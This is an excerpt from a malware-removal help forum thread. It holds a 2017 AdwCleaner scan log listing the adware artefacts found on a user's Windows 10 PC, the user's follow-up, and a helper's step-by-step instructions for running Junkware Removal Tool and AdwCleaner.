HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected

==== End of Fixlog 22:55:48 ====

AdwCleaner - 

# AdwCleaner v6.044 - Logfile created 13/03/2017 at 23:03:11
# Updated on 28/02/2017 by Malwarebytes
# Database : 2017-03-13.1 [Server]
# Operating System : Windows 10 Pro  (X64)
# Username : stipe - DESKTOP-SBND6RH
# Running from : C:\Users\stipe\Desktop\AdwCleaner (1).exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

Service Found:  iSafeKrnl
Service Found:  iSafeKrnlBoot
Service Found:  iSafeKrnlKit
Service Found:  iSafeKrnlMon
Service Found:  iSafeKrnlR3
Service Found:  iSafeNetFilter
Service Found:  iSafeService
Service Found:  FirefoxU
Service Found:  Apps_Cfg


***** [ Folders ] *****

Folder Found:  C:\Program Files (x86)\WinSnare(4.2.9)
Folder Found:  C:\Users\stipe\AppData\Roaming\Elex-tech
Folder Found:  C:\Users\stipe\AppData\Roaming\aMule
Folder Found:  C:\Users\stipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\amuleC
Folder Found:  C:\ProgramData\NetworkPacketManitor
Folder Found:  C:\ProgramData\Microleaves
Folder Found:  C:\ProgramData\vCore
Folder Found:  C:\ProgramData\Hotfreshs
Folder Found:  C:\ProgramData\Plusdaxs
Folder Found:  C:\Program Files (x86)\Elex-tech
Folder Found:  C:\Windows\SysWoW64\config\systemprofile\AppData\Roaming\Tencent
Folder Found:  C:\Program Files (x86)\Firefox
Folder Found:  C:\Users\stipe\AppData\Roaming\Firefox
Folder Found:  C:\Users\stipe\AppData\Local\Firefox


***** [ Files ] *****

File Found:  C:\Users\stipe\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Free Youtube Downloader.lnk
File Found:  C:\Windows\SysNative\log\iSafeKrnlCall.log
File Found:  C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
File Found:  C:\Windows\SysNative\drivers\iSafeNetFilter.sys
File Found:  C:\Users\Public\Desktop\Free Youtube Downloader.lnk
File Found:  C:\Users\Public\Documents\temp.dat
File Found:  C:\Users\Public\Documents\report.dat
File Found:  C:\Users\stipe\AppData\Roaming\uninstall_temp.ico


***** [ DLL ] *****

No malicious DLLs found.


***** [ WMI ] *****

No malicious keys found.


***** [ Shortcuts ] *****

No infected shortcut found.


***** [ Scheduled Tasks ] *****

Task Found:  Event Collector Command Line Utility
Task Found:  Microsoft\Windows\Multimedia\Manager


***** [ Registry ] *****

Key Found:  HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
Key Found:  [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
Key Found:  HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
Key Found:  [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
Key Found:  HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Found:  HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Found:  [x64] HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Found:  [x64] HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Found:  HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Key Found:  HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Key Found:  HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Key Found:  HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Key Found:  HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Found:  HKU\.DEFAULT\Software\ompndb
Key Found:  HKU\.DEFAULT\Software\jhdbca
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Installer
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Reimage
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Vittalia
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\AutoTime
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\VideoBox
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\mtHotfresh
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\mtApphserftoH
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\WinSnare
Key Found:  HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\mtPlusdax
Key Found:  HKU\S-1-5-18\Software\ompndb
Key Found:  HKU\S-1-5-18\Software\jhdbca
Key Found:  HKCU\Software\Installer
Key Found:  HKCU\Software\Reimage
Key Found:  HKCU\Software\Vittalia
Key Found:  HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  HKCU\Software\AutoTime
Key Found:  HKCU\Software\VideoBox
Key Found:  HKCU\Software\mtHotfresh
Key Found:  HKCU\Software\mtApphserftoH
Key Found:  HKCU\Software\WinSnare
Key Found:  HKCU\Software\mtPlusdax
Key Found:  HKLM\SOFTWARE\Elex-tech
Key Found:  HKLM\SOFTWARE\ScreenShot
Key Found:  HKLM\SOFTWARE\ompndb
Key Found:  HKLM\SOFTWARE\jhdbca
Key Found:  HKLM\SOFTWARE\Microleaves
Key Found:  HKLM\SOFTWARE\mtHotfresh
Key Found:  HKLM\SOFTWARE\mtApphserftoH
Key Found:  HKLM\SOFTWARE\startpageing123Software
Key Found:  HKLM\SOFTWARE\msServer
Key Found:  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
Key Found:  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns
Key Found:  [x64] HKCU\Software\Installer
Key Found:  [x64] HKCU\Software\Reimage
Key Found:  [x64] HKCU\Software\Vittalia
Key Found:  [x64] HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  [x64] HKCU\Software\AutoTime
Key Found:  [x64] HKCU\Software\VideoBox
Key Found:  [x64] HKCU\Software\mtHotfresh
Key Found:  [x64] HKCU\Software\mtApphserftoH
Key Found:  [x64] HKCU\Software\WinSnare
Key Found:  [x64] HKCU\Software\mtPlusdax
Key Found:  [x64] HKLM\SOFTWARE\Reimage
Key Found:  [x64] HKLM\SOFTWARE\ompndb
Key Found:  [x64] HKLM\SOFTWARE\jhdbca
Key Found:  [x64] HKLM\SOFTWARE\Microleaves
Key Found:  [x64] HKLM\SOFTWARE\InterSect Alliance
Key Found:  HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Value Found:  HKCU\Environment [SNF]
Value Found:  HKCU\Environment [SNP]
Key Found:  HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting
Value Found:  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
Key Found:  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Hotfresh.exe
Key Found:  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\ApphserftoH.exe
Key Found:  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Hotfresh.exe
Key Found:  HKCU\SOFTWARE\Classes\ChromeHTML
Key Found:  HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML


***** [ Web browsers ] *****

No malicious Firefox based browser items found.
No malicious Chromium based browser items found.

*************************

C:\AdwCleaner\AdwCleaner[S0].txt - [6887 Bytes] - [13/03/2017 23:03:11]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [6960 Bytes] ##########

I have attached FRST and Addition.txt




#14 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts

Posted 13 March 2017 - 05:22 PM

AdwCleaner found around 37 threats, but since you didn't mention clicking the "Clean" button, I didn't do it.

Also, these programs are running in task manager, and when I try to end them, it says access denied - http://prntscr.com/ejlnkk

Also, these programs still appear in Programs and Features - http://prntscr.com/ejlnud  http://prntscr.com/ejlnxk  http://prntscr.com/ejlo56  http://prntscr.com/ejlo8s

 

I won't do anything unless instructed.


Edited by stipess, 13 March 2017 - 05:23 PM.


#15 Slurppa

Slurppa

  • Malware Study Hall Senior
  • 656 posts

Posted 15 March 2017 - 12:40 PM

Hi stipess

Let's continue

Step 1:

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 2:

Please download AdwCleaner by Malwarebytes and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator
  • The tool will start to update the database if one is required.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button.
  • A window will open which lists the logs of your scans.
  • Click on the Scan tab.
  • Double-click the most recent scan which will be at the top of the list....the log will appear.
  • Review the results...see note below
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles is saved to C:\AdwCleaner.
  • -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.
Post the JRT log, AdwCleaner log & new FRST log in your next reply.

Member of the Bleeping Computer A.I.I. early response team!




